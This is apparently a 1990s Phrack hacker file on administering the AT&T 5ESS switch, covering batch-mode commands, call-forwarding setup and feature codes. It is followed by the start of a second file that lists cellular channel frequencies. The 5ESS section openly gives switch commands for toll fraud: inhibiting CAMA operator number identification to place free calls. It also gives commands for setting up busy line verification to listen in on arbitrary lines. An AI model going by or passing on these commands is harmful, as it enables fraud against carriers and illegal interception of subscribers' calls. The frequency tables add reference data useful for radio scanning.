      BMD - batch mode display
      BMR - batch mode release



BMI - Batch Mode Input - TIMEREL and DEMAND


Entering BMI (Batch Mode Input), one types `` BMI '' at the RC/V
menu prompt. Once entering, you will be prompted with whether
the input is DEMAND (demand) or TIMEREL (Time Release). DEMAND
input allows one to manual have the batch update the database,
TIMEREL is automatic. TIMEREL has one enter a time and date.
  When using DEMAND, you will be prompted for the file name. The
file will be in `` /rclog '' in the DMERT OS.
  In TIMEREL, you will be prompted with the CLERK-ID, which in this
case is the file name for the file in the `` /rclog ''. Then
for VERBOSE options, the RC SRVOR (Recent Change Service Order)
is displayed on the screen.


-RC SRVOR View in the BMI TIMEREL Batch Option-
------------------------------------------------------------------------------



                              5ESS SWITCH
                           RECENT CHANGE  B.1
                        SERVICE ORDER NUMBER VIEW

     *1. ORDNO     __________
     *2. ITNO      ____
     *3. MSGNO     ____

     #4. RDATE     ______
     #5. RTIME     ____



Enter Insert, Change, Validate, or Print:


-----------------------------------------------------------------------------


ORDNO = Service Order Number
ITNO  = Item Number
MSGNO = Message Number
RDATE = Release Date (Update database Date)
RTIME = Release Time (Update database Time)




BMD - batch mode display


   BMD is a "mask" of RC/V done from the RC/V channel craft shell, by using the
REPT:RCHIST or a pseudo menu system. All transactions are displayed on the ROP,
though the data could also be sent to a file in the `` /rclog '' in DMERT.
   The Pseudo menu system looks like:

----------------------------------------------------------------------------


1. Summary of clerk activity

2. Activity by service order number

3. Activity by clerk ID

4. Return to view or class menu.


----------------------------------------------------------------------------

1  allows one to view the "DELAYED RELEASE SUMMARY REPORT."
2  produces a "DELAYED RELEASE REPORT BY SERVICE ORDER."
3  produces the "DELAYED RELEASE REPORT BY CLERK ID."
4  Return to view or class menu, self-explanatory.



REPT:RCHIST - BMD

  The REPT:RCHIST BMD (Text) command is done from the RC/V channel craft
shell. The command synopsis is:


5E2 - 5E5 (Generics)

REPT:RCHIST,CLERK=[,FORMAT={SUMMARY|DETAIL}]{[,ALL]|[,PENDING][,COMPLETE]
[,ERROR][,DEMAND]}[,DEST=FILENAME][,TIME=XXXXXXXXXX];


5E6 - 5E8 (Generics)

REPT:RCHIST,CLERK=a[,FORMAT={SUMMARY|DETAIL}] {,ALL|,b}[,DEST={c|FILE}]
[,TIME=XXXXXXXXXX];

SUMMARY         - Report selection, format by key.
DETAIL          - Report selection for Recent Change entire.
ALL             - Report all recent changes.
PENDING         - Report pending recent change input.
COMPLETE        - Report released recent changes that was successful
                  when completed.
FILE            - Name for file in /rclog
ERROR           - Report recent changes released with error.
DEMAND          - Report demand recent changes.
TIME=XXXXXXXXXX - XX - mounth, XX - day, XX - hour, XX minute, XX - Second





BMR - batch mode release


    This is the manual release (updating) of the 5ESS database. This is done
from the RC/V channel craft shell.  The command that is used is the EXC:RCRLS
input message. There is no real need to go into this message.

Adding RCF (Remote Call Forward) on a 5ESS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1. At the "MENU COMMANDS" commands prompt of the 5ESS main menu in the
   RC/V APPRC menu system of the 5ESS, enter '12' for the "BRCS FEATURE
   DEFINITION".  Then access screen '1.11', this is the BRCS screen. When it
   asks you to 'ENTER DATABASE OPERATION' enter "U" for Update and hit
   return.

   NOTE: When at menu '12,' you will NOT see '1.11' listed in the menu
   options.  By just accessing menu '1' you will not be able to add features.
   This is a problem with the 5ESS menu system.

2. Type in the Telephone Number. It should look like this:



------------------------------------------------------------------------------

  Mon Feb 31 09:09:09 2001    RFA_TN

  -------------------------------------------------------------------------

                           5ESS SWITCH WCDS0
  SCREEN 1 OF 2           RECENT CHANGE 1.11
                BRCS FEATURE ASSIGNMENT (LINE ASSIGNMENT)

 *1. TN 5551212    * 2. OE  _ ________    3. LCC ___   4. PIC 288
 *5. PTY _*          6. MLHG ____         7. MEMB ____ 8. BFGN _______ _

                        FEATURE LIST (FEATLIST)
  ROW   11. FEATURE  A P   15. FEATURE  A P  19. FEATURE  A P  23. FEATURE  A P
  1.        /CFV     N _       ________ _ _      ________ _ _      ________ _ _
  2.        ________ _ _       ________ _ _      ________ _ _      ________ _ _
  3.        ________ _ _       ________ _ _      ________ _ _      ________ _ _
  4.        ________ _ _       ________ _ _      ________ _ _      ________ _ _


------------------------------------------------------------------------------

   and will prompt you with:

------------------------------------------------------------------------------

Enter Insert, Change, Validate, screen#, or Print: _
form operation prompt

------------------------------------------------------------------------------

          I   -   to insert a form
          C   -   to change a field on a form
          V   -   to validate the form
          A   -   to display the desired screen number
          P   -   to print the current screen
          U   -   to update the form


   Enter `` C '' to change, access filed 11 and row 1 (goto the /CFV
   wherever it may be) or add /CFR if it is not there. If it does though,
   leave the "A" (Active) field "N" (Yes or No). Change the P (Presentation)
   column to "U" (Update). Then Hit Return.

   NOTE: Different Generics have other fields, one of them being a AC (Access
   Code) field.  This field is a logical field, that mean only accepts a
   "Y" for yes and "N" for no.  Also when adding the feature to the switch,
   the row and field numbers may not be shown, but will always follow this
   pattern.  Also note that the /CFV (Call forwarding variable) feature may not
   be there, there maybe no features on the line.  These examples are from
   Generic 4 (2).  Here is a example of 5E8 (which is not used too many places,
   but this is what menu 1.11 in the BRCS Feature Definition looks like:


-------------------------------------------------------------------------------


                             5ESS SWITCH
                    SCREEN 1 OF 2 RECENT CHANGE  1.11
                (5112,5113)BRCS FEATURE ASSIGNMENT (LINE)

(*)1. TN _______ (*)2. OE  _ ________    3. LCC ___   4. PID ___
(*)6. MLHG ____     8. BFGN _______ _
(*)5. PTY _(*)                                7. MEMB ____

                     11. FEATURE LIST (FEATLIST)
 ROW  FEATURE   A P AC R    ROW  FEATURE   A P AC R    ROW  FEATURE   A P AC R
 1    ________  _ _ _  _     8   ________  _ _ _  _    15   ________  _ _ _  _
 2    ________  _ _ _  _     9   ________  _ _ _  _    16   ________  _ _ _  _
 3    ________  _ _ _  _    10   ________  _ _ _  _    17   ________  _ _ _  _
 4    ________  _ _ _  _    11   ________  _ _ _  _    18   ________  _ _ _  _
 5    ________  _ _ _  _    12   ________  _ _ _  _    19   ________  _ _ _  _
 6    ________  _ _ _  _    13   ________  _ _ _  _    20   ________  _ _ _  _
 7    ________  _ _ _  _    14   ________  _ _ _  _    21   ________  _ _ _  _



Enter Insert, Change, Validate, screen#, or Print: _


-------------------------------------------------------------------------------



   Hit Return twice to get back to "ENTER UPDATE, CHANGE, SCREEN #, OR PRINT:".
   Enter a "U" for update and hit Return. It will say "FORM UPDATE".

3. Next access screen 1.22, call forwarding (line parameters) or it will
   just come up automatically if you set the "P" to "U".



------------------------------------------------------------------------------

  Mon Feb 31 09:09:09 2001    RCFLNTN

    ----------------------------------------------------------------------


                            5ESS SWITCH WCDS0
                           RECENT CHANGE 1.22
                  CALL FORWARDING (LINE PARAMETERS)


   *1. TN            5551212
   *6. FEATURE       CFR
    9. FWDTODN       ______________________________
   10. BILLAFTX      0                    16. SIMINTER       99
   11. TIMEOUT       0                    17. SIMINTRA       99
   12. BSTNINTVL     0                    18. CFMAX          32
   13. CPTNINTVL     0                    19. BSRING         N



-------------------------------------------------------------------------------


4. If you used the automatic forms presentation, it will have the telephone
   number already on LINE1. If not retype the telephone number you want
   forwarded. The bottom of the screen will say "ENTER UPDATE, CHANGE, VALIDATE
   OR PRINT:", type "C" for change and hit return.

5. When it says CHANGE FIELD type "9" and enter your forward to DN (Destination
   Number) including NPA if necessary. This will put you back to the "CHANGE
   FIELD" prompt. Hit return again for the "ENTER UPDATE, CHANGE, VALIDATE OR
   PRINT:". Hit "U" for Update form and wait for "FORM UPDATED".

6. Lastly, access screen 1.12, BRCS FEATURE ACTIVATION (LINE ASSIGNMENT). At the
   prompt enter a "U" for Update, and on ROW 11 Line 1 (or wherever), change
   the "N" in column "A" to a "Y" for Yes, and you are done.



Adding other features
~~~~~~~~~~~~~~~~~~~~~

  To add other features onto a line, follow the same format for adding the
/CFR, but you may not need to access 1.22.  Some other features are:

Feature Code:          Feature Name:

/LIDLXA            -   CLID
/CFR               -   Remote Call Forward
/CWC1              -   Call Waiting
/CFBLIO            -   call forward busy line i/o
/CFDAIO            -   call forward don't answer i/o
/CFV               -   call forwarding variable
/CPUO              -   call pick up o  !used in the selq1 field!
/CPUT              -   call pick up t  !used in the tpredq field!
/CWC1D             -   Premiere call waiting
/DRIC              -   Dist. ring
/IDCT10            -   Inter room ID
/IDCTX2            -   1digit SC
/IDCTX2            -   Interoom ID 2
/IDCTX2            -   Premiere 7/30, convenience dialing
/IDCTX3            -   Premiere 7/30, no cd
/IDMVP1            -   Premiere 2/6, no convenience dialing
/IDMVP2            -   Premiere 2/6, CD, not control sta.
/IDMVP3            -   Premiere 2/6, CD, control station
/MWCH1             -   Call hold
/MWCTIA2           -   Call transfer 2
/TGUUT             -   Terminal group ID number with TG view (1.29).




ANI/F  the whole switch
~~~~~~~~~~~~~~~~~~~~~~~

 Automatic Number Identification failure (also called "dark calls") are
caused by variety of different things.  To understand this better, here are
the technical names and causes, note this is not in stone and the causes
are not the only causes for a ANI-F to occur.

ANF   -- Failure to receive automatic number identification
         (ANI) digits on incoming local access and transport
         area (LATA) trunk.
ANF2  -- Automatic number identification (ANI) collected by
         an operator following a failure to receive ANI
         digits on an incoming centralized automatic
         message accounting (CAMA) trunk from the DTMF decoder.
ANI   -- Time-out waiting for far off-hook from Traffic
         Service Position System (TSPS) before sending ANI
         digits.

  Though, I have always wondered how to set one up myself in a safe way.
 One way nice way to get ANI/F through a 5ESS to use a inhibit command.

      INH:CAMAONI;

The command will inhibits centralized automatic message accounting (CAMA)
operator number identification (ONI) processing. This is done from the DTMF
decoder (going over later).  This message will cause a minor alarm too occur.
If in the CO when the alarm occurs, you will here this bell all the time,
because something is always going out. In this case, this alarm is a level 1
(max to five) and the bell will ring once.
  Once this message is inputed, all calls through CAMA operator will be
free of change. So just dial the operator and you will have free calls.

To place this back on the switch, just type:

      ALW:CAMAONI;

and the minor alarm will stop, and things will go back to normal.



Setting up your own BLV on the 5ESS from the Craft shell RC/V Channel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Well, we have come to the fun part, how to access the No-Test trunk on
the 5ESS (this is also called adding the third trunk). I will not be too
specific on how to do this.  You will need to figure out just how to do this.
  The first thing you want to do is to request a seizure of a line for
interactive trunk and line testing. One must assign a test position (TP).

SET:WSPHONE,TP=a,DN=b
SET:WSPOS,TP=a,DN=b

          a = A number between 1 and 8
          b = The number you wish assigned to the test position

  This will chose a number to be the test number on the switch. Now using
the CONN:WSLINE one can set up a BLV.


CONN:WSLINE,TP=a,DN=b;

          a = TP that you set from the SET:WSPOS
          b = The number you want to BLV

To set this up on a MLHG (can come in real useful for those peksy
                           public packet switched networks), do a:

CONN:WSLINE,TP=a,MLHG=x-y;

          x = MLHG number, y = MLHG member number



To take set things back to normal and disconnect the BLV do a:

DISC:WSPHONE,TP=z

          z = TP 1 through 8


NOTE:

One may need to do a ALW:CALLMON before entering the CONN commands

BIG NOTE:

If you set your home telephone number as the test position, and you
have only one phone line, you are stupid.




Comments about the Underground
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

   There are a few people out there who have no idea what they are doing, and
go on thinking they know it all (i.e. No Name Brand).  It pisses me off when
these people just go off and make shit up about things they have no idea
what they are talking about.
   This file is to all the lazy people out there that just keep bitching
and moaning about not knowing where to find information.



Other Sources
~~~~~~~~~~~~~

Here is a list of Manuals that you can order from the CIC (1-800-432-6600).
Note that some of these manuals are well over hundreds of dollars.


Manual 234-105-110   System Maintenance Requirements and Tools
Manual 235-001-001   Documentation Guide
Manual 235-070-100   Switch Administration Guidelines
Manual 235-100-125   System Description
Manual 235-105-110   System Maintenance Requirements and Tools
Manual 235-105-200   Precutover and Cutover Procedures
Manual 235-105-210   Routine Operations and Maintenance
Manual 235-105-220   Corrective Maintenance
Manual 235-105-231   Hardware Change Procedures - Growth
Manual 235-105-24x   Generic Retrofit Procedures
Manual 235-105-250   System Recovery
Manual 235-105-250A  Craft Terminal Lockout Job Aid
Manual 235-105-331   Hardware Change Procedures - Degrowth
Manual 235-105-44x   Large Terminal Growth Procedures
Manual 235-118-200   Recent Change Procedures Menu Mode Generic Program
Manual 235-118-210   Recent Change Procedures Menu Mode
Manual 235-118-213   Menu Mode 5E4 Software Release
Manual 235-118-214   Batch Release 5E4 Software Release
Manual 235-118-215   Text Interface 5E4 Software Release
Manual 235-118-216   Recent Change Procedures
Manual 235-118-217   Recent Change Procedures Batch Release 5E5 Software
                     Release
Manual 235-118-218   Recent Change Attribute Definitions 5E5 Software Release
Manual 235-118-21x   Recent Change Procedures - Menu Mode
Manual 235-118-224   Recent Change Procedures 5E6 Software Release
Manual 235-118-225   Recent Change Reference 5E6 Software Release
Manual 235-118-240   Recent Change Procedures
Manual 235-118-241   Recent Change Reference
Manual 235-118-242   Recent Change Procedures 5E8 Software Release
Manual 235-118-24x   Recent Change Procedures
Manual 235-118-311   Using RMAS 5E4 Software Release
Manual 235-118-400   Office Records and Database Query 5E4 Software Release
Manual 235-190-101   Business and Residence Modular Features **
Manual 235-190-105   ISDN Features and Applications
Manual 235-190-115   Local and Toll System Features
Manual 235-190-120   Common Channel Signaling Service Features
Manual 235-190-130   Local Area Services Features
Manual 235-190-300   Billing Features
Manual 235-600-103   Translations Data
Manual 235-600-30x   ECD/SG Data Base
Manual 235-600-400   Audits
Manual 235-600-500   Assert Manual
Manual 235-600-601   Processor Recovery Messages
Manual 235-700-300   Peripheral Diagnostic Language
Manual 235-900-101   Technical Specification and System Description
Manual 235-900-103   Technical Specification
Manual 235-900-104   Product Specification
Manual 235-900-10x   Product Specification
Manual 235-900-301   ISDN Basic Rate Interface Specification
Manual 250-505-100   OSPS Description and Procedures
Manual 363-200-101   DCLU Integrated SLC Carrier System
Manual TG-5          Translation Guide

Practice 254-341-100 File System Software Subsystem Description
                     3B20D Computer
Practice 254-301-110 Input-Output Processor Peripheral Controllers
                     Description and Theory of Operation AT$T 3B20D
                     Model 1 Computer   None.
Practice 254-341-220 3B20 System Diagnostic Software Subsystem
                     Description 3B20D Processor

CIC Select Code 303-001 Craft Interface User's Guide
CIC Select Code 303-002 Diagnostics User's Guide
CIC Select Code 303-006 AT$T AM UNIX RTR Operating System, System
                        Audits Guide

IM-5D000-01 Input Manual
OM-5d000-01 Output Manual

OPA-5P670-01 The Administrator User Guide
OPA-5P672-01 The Operator User Guide
OPA-5P674-01 The RMAS Generic - Provided User Masks


Trademarks
~~~~~~~~~~

5ESS - Registered trademark of AT$T.
CLCI - Trademark of Bell Communications Research, Inc.
CLLI - Trademark of Bell Communications Research, Inc.
ESS - Trademark of AT$T.
SLC - Registered trademark of AT$T.
UNIX - Registered trademark of AT$T.
DMERT - Registered trademark of AT$T.
SCCS - Registered trademark of AT$T
DMS - Registered trademark of Northern Telecom
DEC - Registered trademark of Digital Equipment Corporation.
VT100 - Trademark of Digital Equipment Corporation.


Acronyms and Abbreviations
~~~~~~~~~~~~~~~~~~~~~~~~~~

ADTS    -  Automatic Data Test System
ALIT    -  Automatic Line Insulation Testing
AMA     -  Automatic Message Accounting
AP      -  Attached Processor  (1AESS 3B20)
ATICS   -  Automated Toll Integrity Checking System
BLV     -  Busy Line Verification
BMD     -  Batch Mode Display
BMI     -  Batch Mode Input - TIMEREL and DEMAND
BMR     -  Batch Mode Release
BRCS    -  Business Residence Custom Service
CAMA    -  Centralized Automatic Message Accounting
CIC     -  Customer Information Center (AT$T)
DAMT    -  Direct Access Mechanize Testing
DLTU    -  Digital Line Trunk Unit
DMERT   -  Duplex Multiple Environment Real Time
DSU     -  Digital Service Unit
DTAC    -  Digital Test Access Connector
GRASP   -  Generic Access Package
IOP     -  Input/Output Processor
IPS     -  Integrated Provisioning System
ISDN    -  Integrated Services Digital Network
ITNO    -  Item Number
LMOS    -  Loop Maintenance Operations System
LU      -  Line Unit
MCC     -  Master Control Center
MLT-2   -  Mechanized Loop Testing - The Second Generation of Equipment
MML     -  Man Machine Language
MSGNO   -  Message Number
MSGS    -  Message Switch
NCT     -  Network Control and Timing
ODD     -  Office Dependent Data
OE      -  Office Equipment
ONI     -  Operator Number Identification
ORDNO   -  Service Order Number
OSPS    -  Operator Service Position System
OSS     -  Operations Support System
POVT    -  Provisioning On-site Verification Testing
RC      -  Recent Change
RC/V    -  Recent Change and Verify
RDATE   -  Release Date (Update Database Date)
RMAS    -  Remote Memory Administration
RTIME   -  Release Time (Update Database Time)
RTS     -  Remote Test Unit
SARTS   -  Switched Access Remote Test System
SCCS    -  Switching Control Center System
SLC     -  Subicer Loop Carrier
SM      -  Switching Module
SMAS    -  Switched Maintenance Access System
SMPU    -  Switch Module Processor Unit
SONET   -  Synchronous Optical Network
SPC     -  Stored Program Control
STLWS   -  Supplementary Trunk and Line Work Station
TFTP    -  Television Facility Test Position
TIMEREL -  Time Release
TIRKS   -  Trunk Integrated Record Keeping System
TMS     -  Time Multiplexed Switch
TRCO    -  Trouble Reporting Control Office
TSI     -  Time Slot Interchangers
TSIU    -  Time Slot Interchange Unit
TU      -  Trunk Unit
VFY     -  Verify

I give AT$T due credit for much of this file, for without them, it would not
have been possible!


--------------------------------------------------------------------------------


                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 17 of 27

                             CELLULAR INFORMATION

                                   COMPILED
                                      BY

                                    MADJUS
                                      of
                                    N.O.D.

                   {Thanks go out to Spy Ace & The Nobody}


CELLULAR FREQUENCIES BY CELL

BAND A

Cell # 1                  Transmit        Receive
--------------------------------------------------
Channel 1 (333) Tx 879.990 Rx 834.990
Channel 2 (312) Tx 879.360 Rx 834.360
Channel 3 (291) Tx 878.730 Rx 833.730
Channel 4 (270) Tx 878.100 Rx 833.100
Channel 5 (249) Tx 877.470 Rx 832.470
Channel 6 (228) Tx 876.840 Rx 831.840
Channel 7 (207) Tx 876.210 Rx 831.210
Channel 8 (186) Tx 875.580 Rx 830.580
Channel 9 (165) Tx 874.950 Rx 829.950
Channel 10 (144) Tx 874.320 Rx 829.320
Channel 11 (123) Tx 873.690 Rx 828.690
Channel 12 (102) Tx 873.060 Rx 828.060
Channel 13 (81) Tx 872.430 Rx 827.430
Channel 14 (60) Tx 871.800 Rx 826.800
Channel 15 (39) Tx 871.170 Rx 826.170
Channel 16 (18) Tx 870.540 Rx 825.540

Cell # 2
--------------------------------------------------
Channel 1 (332) Tx 879.960 Rx 834.960
Channel 2 (311) Tx 879.330 Rx 834.330
Channel 3 (290) Tx 878.700 Rx 833.700
Channel 4 (269) Tx 878.070 Rx 833.070
Channel 5 (248) Tx 877.440 Rx 832.440
Channel 6 (227) Tx 876.810 Rx 831.810
Channel 7 (206) Tx 876.180 Rx 831.180
Channel 8 (185) Tx 875.550 Rx 830.550
Channel 9 (164) Tx 874.920 Rx 829.920
Channel 10 (143) Tx 874.290 Rx 829.290
Channel 11 (122) Tx 873.660 Rx 828.660
Channel 12 (101) Tx 873.030 Rx 828.030
Channel 13 (80) Tx 872.400 Rx 827.400
Channel 14 (59) Tx 871.770 Rx 826.770
Channel 15 (38) Tx 871.140 Rx 826.140
Channel 16 (17) Tx 870.510 Rx 825.510

Cell # 3
--------------------------------------------------
Channel 1 (331) Tx 879.930 Rx 834.930
Channel 2 (310) Tx 879.300 Rx 834.300
Channel 3 (289) Tx 878.670 Rx 833.670
Channel 4 (268) Tx 878.040 Rx 833.040
Channel 5 (247) Tx 877.410 Rx 832.410
Channel 6 (226) Tx 876.780 Rx 831.780
Channel 7 (205) Tx 876.150 Rx 831.150
Channel 8 (184) Tx 875.520 Rx 830.520
Channel 9 (163) Tx 874.890 Rx 829.890
Channel 10 (142) Tx 874.260 Rx 829.260
Channel 11 (121) Tx 873.630 Rx 828.630
Channel 12 (100) Tx 873.000 Rx 828.000
Channel 13 (79) Tx 872.370 Rx 827.370
Channel 14 (58) Tx 871.740 Rx 826.740
Channel 15 (37) Tx 871.110 Rx 826.110
Channel 16 (16) Tx 870.480 Rx 825.480

Cell # 4
--------------------------------------------------
Channel 1 (330) Tx 879.900 Rx 834.900
Channel 2 (309) Tx 879.270 Rx 834.270
Channel 3 (288) Tx 878.640 Rx 833.640
Channel 4 (267) Tx 878.010 Rx 833.010
Channel 5 (246) Tx 877.380 Rx 832.380
Channel 6 (225) Tx 876.750 Rx 831.750
Channel 7 (204) Tx 876.120 Rx 831.120
Channel 8 (183) Tx 875.490 Rx 830.490
Channel 9 (162) Tx 874.860 Rx 829.860
Channel 10 (141) Tx 874.230 Rx 829.230
Channel 11 (120) Tx 873.600 Rx 828.600
Channel 12 (99) Tx 872.970 Rx 827.970
Channel 13 (78) Tx 872.340 Rx 827.340
Channel 14 (57) Tx 871.710 Rx 826.710
Channel 15 (36) Tx 871.080 Rx 826.080
Channel 16 (15) Tx 870.450 Rx 825.450

Cell # 5
--------------------------------------------------
Channel 1 (329) Tx 879.870 Rx 834.870
Channel 2 (308) Tx 879.240 Rx 834.240
Channel 3 (287) Tx 878.610 Rx 833.610
Channel 4 (266) Tx 877.980 Rx 832.980
Channel 5 (245) Tx 877.350 Rx 832.350
Channel 6 (224) Tx 876.720 Rx 831.720
Channel 7 (203) Tx 876.090 Rx 831.090
Channel 8 (182) Tx 875.460 Rx 830.460
Channel 9 (161) Tx 874.830 Rx 829.830
Channel 10 (140) Tx 874.200 Rx 829.200
Channel 11 (119) Tx 873.570 Rx 828.570
Channel 12 (98) Tx 872.940 Rx 827.940
Channel 13 (77) Tx 872.310 Rx 827.310
Channel 14 (56) Tx 871.680 Rx 826.680
Channel 15 (35) Tx 871.050 Rx 826.050
Channel 16 (14) Tx 870.420 Rx 825.420

Cell # 6
--------------------------------------------------
Channel 1 (328) Tx 879.840 Rx 834.840
Channel 2 (307) Tx 879.210 Rx 834.210
Channel 3 (286) Tx 878.580 Rx 833.580
Channel 4 (265) Tx 877.950 Rx 832.950
Channel 5 (244) Tx 877.320 Rx 832.320
Channel 6 (223) Tx 876.690 Rx 831.690
Channel 7 (202) Tx 876.060 Rx 831.060
Channel 8 (181) Tx 875.430 Rx 830.430
Channel 9 (160) Tx 874.800 Rx 829.800
Channel 10 (139) Tx 874.170 Rx 829.170
Channel 11 (118) Tx 873.540 Rx 828.540
Channel 12 (97) Tx 872.910 Rx 827.910
Channel 13 (76) Tx 872.280 Rx 827.280
Channel 14 (55) Tx 871.650 Rx 826.650
Channel 15 (34) Tx 871.020 Rx 826.020
Channel 16 (13) Tx 870.390 Rx 825.390

Cell # 7
--------------------------------------------------
Channel 1 (327) Tx 879.810 Rx 834.810
Channel 2 (306) Tx 879.180 Rx 834.180
Channel 3 (285) Tx 878.550 Rx 833.550
Channel 4 (264) Tx 877.920 Rx 832.920
Channel 5 (243) Tx 877.290 Rx 832.290
Channel 6 (222) Tx 876.660 Rx 831.660
Channel 7 (201) Tx 876.030 Rx 831.030
Channel 8 (180) Tx 875.400 Rx 830.400
Channel 9 (159) Tx 874.770 Rx 829.770
Channel 10 (138) Tx 874.140 Rx 829.140
Channel 11 (117) Tx 873.510 Rx 828.510
Channel 12 (96) Tx 872.880 Rx 827.880
Channel 13 (75) Tx 872.250 Rx 827.250
Channel 14 (54) Tx 871.620 Rx 826.620
Channel 15 (33) Tx 870.990 Rx 825.990
Channel 16 (12) Tx 870.360 Rx 825.360

Cell # 8
--------------------------------------------------
Channel 1 (326) Tx 879.780 Rx 834.780
Channel 2 (305) Tx 879.150 Rx 834.150
Channel 3 (284) Tx 878.520 Rx 833.520
Channel 4 (263) Tx 877.890 Rx 832.890
Channel 5 (242) Tx 877.260 Rx 832.260
Channel 6 (221) Tx 876.630 Rx 831.630
Channel 7 (200) Tx 876.000 Rx 831.000
Channel 8 (179) Tx 875.370 Rx 830.370
Channel 9 (158) Tx 874.740 Rx 829.740
Channel 10 (137) Tx 874.110 Rx 829.110
Channel 11 (116) Tx 873.480 Rx 828.480
Channel 12 (95) Tx 872.850 Rx 827.850
Channel 13 (74) Tx 872.220 Rx 827.220
Channel 14 (53) Tx 871.590 Rx 826.590
Channel 15 (32) Tx 870.960 Rx 825.960
Channel 16 (11) Tx 870.330 Rx 825.330

Cell # 9
--------------------------------------------------
Channel 1 (325) Tx 879.750 Rx 834.750
Channel 2 (304) Tx 879.120 Rx 834.120
Channel 3 (283) Tx 878.490 Rx 833.490
Channel 4 (262) Tx 877.860 Rx 832.860
Channel 5 (241) Tx 877.230 Rx 832.230
Channel 6 (220) Tx 876.600 Rx 831.600
Channel 7 (199) Tx 875.970 Rx 830.970
Channel 8 (178) Tx 875.340 Rx 830.340
Channel 9 (157) Tx 874.710 Rx 829.710
Channel 10 (136) Tx 874.080 Rx 829.080
Channel 11 (115) Tx 873.450 Rx 828.450
Channel 12 (94) Tx 872.820 Rx 827.820
Channel 13 (73) Tx 872.190 Rx 827.190
Channel 14 (52) Tx 871.560 Rx 826.560
Channel 15 (31) Tx 870.930 Rx 825.930
Channel 16 (10) Tx 870.300 Rx 825.300

Cell # 10
--------------------------------------------------
Channel 1 (324) Tx 879.720 Rx 834.720
Channel 2 (303) Tx 879.090 Rx 834.090
Channel 3 (282) Tx 878.460 Rx 833.460
Channel 4 (261) Tx 877.830 Rx 832.830
Channel 5 (240) Tx 877.200 Rx 832.200
Channel 6 (219) Tx 876.570 Rx 831.570
Channel 7 (198) Tx 875.940 Rx 830.940
Channel 8 (177) Tx 875.310 Rx 830.310
Channel 9 (156) Tx 874.680 Rx 829.680
Channel 10 (135) Tx 874.050 Rx 829.050
Channel 11 (114) Tx 873.420 Rx 828.420
Channel 12 (93) Tx 872.790 Rx 827.790
Channel 13 (72) Tx 872.160 Rx 827.160
Channel 14 (51) Tx 871.530 Rx 826.530
Channel 15 (30) Tx 870.900 Rx 825.900
Channel 16 (9) Tx 870.270 Rx 825.270

Cell # 11
--------------------------------------------------
Channel 1 (323) Tx 879.690 Rx 834.690
Channel 2 (302) Tx 879.060 Rx 834.060
Channel 3 (281) Tx 878.430 Rx 833.430
Channel 4 (260) Tx 877.800 Rx 832.800
Channel 5 (239) Tx 877.170 Rx 832.170
Channel 6 (218) Tx 876.540 Rx 831.540
Channel 7 (197) Tx 875.910 Rx 830.910
Channel 8 (176) Tx 875.280 Rx 830.280
Channel 9 (155) Tx 874.650 Rx 829.650
Channel 10 (134) Tx 874.020 Rx 829.020
Channel 11 (113) Tx 873.390 Rx 828.390
Channel 12 (92) Tx 872.760 Rx 827.760
Channel 13 (71) Tx 872.130 Rx 827.130
Channel 14 (50) Tx 871.500 Rx 826.500
Channel 15 (29) Tx 870.870 Rx 825.870
Channel 16 (8) Tx 870.240 Rx 825.240

Cell # 12
--------------------------------------------------
Channel 1 (322) Tx 879.660 Rx 834.660
Channel 2 (301) Tx 879.030 Rx 834.030
Channel 3 (280) Tx 878.400 Rx 833.400
Channel 4 (259) Tx 877.770 Rx 832.770
Channel 5 (238) Tx 877.140 Rx 832.140
Channel 6 (217) Tx 876.510 Rx 831.510
Channel 7 (196) Tx 875.880 Rx 830.880
Channel 8 (175) Tx 875.250 Rx 830.250
Channel 9 (154) Tx 874.620 Rx 829.620
Channel 10 (133) Tx 873.990 Rx 828.990
Channel 11 (112) Tx 873.360 Rx 828.360
Channel 12 (91) Tx 872.730 Rx 827.730
Channel 13 (70) Tx 872.100 Rx 827.100
Channel 14 (49) Tx 871.470 Rx 826.470
Channel 15 (28) Tx 870.840 Rx 825.840
Channel 16 (7) Tx 870.210 Rx 825.210

Cell # 13
--------------------------------------------------
Channel 1 (321) Tx 879.630 Rx 834.630
Channel 2 (300) Tx 879.000 Rx 834.000
Channel 3 (279) Tx 878.370 Rx 833.370
Channel 4 (258) Tx 877.740 Rx 832.740
Channel 5 (237) Tx 877.110 Rx 832.110
Channel 6 (216) Tx 876.480 Rx 831.480
Channel 7 (195) Tx 875.850 Rx 830.850
Channel 8 (174) Tx 875.220 Rx 830.220
Channel 9 (153) Tx 874.590 Rx 829.590
Channel 10 (132) Tx 873.960 Rx 828.960
Channel 11 (111) Tx 873.330 Rx 828.330
Channel 12 (90) Tx 872.700 Rx 827.700
Channel 13 (69) Tx 872.070 Rx 827.070
Channel 14 (48) Tx 871.440 Rx 826.440
Channel 15 (27) Tx 870.810 Rx 825.810
Channel 16 (6) Tx 870.180 Rx 825.180

Cell # 14
--------------------------------------------------
Channel 1 (320) Tx 879.600 Rx 834.600
Channel 2 (299) Tx 878.970 Rx 833.970
Channel 3 (278) Tx 878.340 Rx 833.340
Channel 4 (257) Tx 877.710 Rx 832.710
Channel 5 (236) Tx 877.080 Rx 832.080
Channel 6 (215) Tx 876.450 Rx 831.450
Channel 7 (194) Tx 875.820 Rx 830.820
Channel 8 (173) Tx 875.190 Rx 830.190
Channel 9 (152) Tx 874.560 Rx 829.560
Channel 10 (131) Tx 873.930 Rx 828.930
Channel 11 (110) Tx 873.300 Rx 828.300
Channel 12 (89) Tx 872.670 Rx 827.670
Channel 13 (68) Tx 872.040 Rx 827.040
Channel 14 (47) Tx 871.410 Rx 826.410
Channel 15 (26) Tx 870.780 Rx 825.780
Channel 16 (5) Tx 870.150 Rx 825.150

Cell # 15
--------------------------------------------------
Channel 1 (319) Tx 879.570 Rx 834.570
Channel 2 (298) Tx 878.940 Rx 833.940
Channel 3 (277) Tx 878.310 Rx 833.310
Channel 4 (256) Tx 877.680 Rx 832.680
Channel 5 (235) Tx 877.050 Rx 832.050
Channel 6 (214) Tx 876.420 Rx 831.420
Channel 7 (193) Tx 875.790 Rx 830.790
Channel 8 (172) Tx 875.160 Rx 830.160
Channel 9 (151) Tx 874.530 Rx 829.530
Channel 10 (130) Tx 873.900 Rx 828.900
Channel 11 (109) Tx 873.270 Rx 828.270
Channel 12 (88) Tx 872.640 Rx 827.640
